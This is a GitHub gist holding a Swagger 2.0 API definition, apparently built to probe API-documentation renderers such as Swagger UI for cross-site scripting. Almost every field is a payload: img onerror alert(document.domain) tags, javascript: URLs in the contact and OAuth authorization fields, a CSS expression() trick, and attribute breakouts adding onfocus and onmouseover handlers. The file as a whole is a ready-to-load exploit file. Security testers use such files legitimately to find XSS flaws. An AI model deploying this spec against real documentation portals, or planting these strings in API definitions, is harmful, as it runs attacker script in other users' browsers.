Skip to content

Instantly share code, notes, and snippets.

@m0nk3y-s3c
Last active June 2, 2020 13:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save m0nk3y-s3c/eaeffaede1f981bd4ca891dd75d3aa8d to your computer and use it in GitHub Desktop.
Save m0nk3y-s3c/eaeffaede1f981bd4ca891dd75d3aa8d to your computer and use it in GitHub Desktop.
{ "swagger": "2.0", "info": { "title": "/qqq'\"><b style='x: expression(alert(1))'>", "description": "/rrr'\"><b style='x: expression(alert(1))'>", "version": "2017-06-04T22:56:06+00:00", "contact": { "name": "/sss'\"></script><img src=x onerror=alert(document.domain)>", "url": "javascript:alert(document.domain)", "email": "x@c.se" } }, "host": "xok", "basePath": "/\"'>eee<img src=x onerror=alert(document.domain)>", "schemes": [ "https" ], "consumes": [ "/ttt'\"></script></select>fff<img src=x onerror=alert(document.domain)>" ], "produces": [ "/uuu'\"></script>ggg<img src=x onerror=alert(document.domain)>" ], "securityDefinitions": { "oauth2": { "flow": "implicit", "authorizationUrl": "javascript:alert(document.domain)//", "scopes": { "web-api": "testing" }, "type": "oauth2" } }, "security": [ { "tokenHeader": ["/xxx'\"><img src=x onerror=alert(document.domain)>"] } ], "paths": { "/><img src=x onerror=alert(document.domain)>": { "post": { "summary": "/'\">bbb</script><img src=x onerror=alert(document.domain)>", "description": "/aaa'\"></script><img src=x onerror=alert(document.domain)>", "tags": ["ccc"], "parameters": [ { "name": "/xxx'tabindex=0 id=aaa onfocus=alert(document.domain) onmouseover=alert(document.domain) yyy\"zzz></script><img src=x onerror=alert(document.domain)>", "in": "body", "schema": { "type": "object", "required": [ "/hhh'\"></script><img src=x onerror=alert(document.domain)>" ], "properties": { "/ccc<img src=x onerror=alert(document.domain)>": { "type": "string", "description": "/iii'\"></script><img src=x onerror=alert(document.domain)>" } }, "description": "/ddd'\"></script><img src=x onerror=alert(document.domain)>" }, "required": true } ], "responses": { "200": { "description": "/jjj'\"></script><img src=x onerror=alert(document.domain)>" }, "400": { "description": "/kkk'\"></script><img src=x onerror=alert(document.domain)>", "schema": { "type": "object", "properties": { "errors": { "type": "object", "additionalProperties": { "type": "string" }, "description": "/lll'\"></script><img src=x onerror=alert(document.domain)>" } }, "description": "/mmm'\"></script><img src=x onerror=alert(document.domain)>" }, "examples": { "/nnn'\"></script><img src=x onerror=alert(document.domain)>": { "errors": { "/ooo'\"></script><img src=x onerror=alert(document.domain)>": "/ppp'\"></script><img src=x onerror=alert(document.domain)>" } } } } } } } } }
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment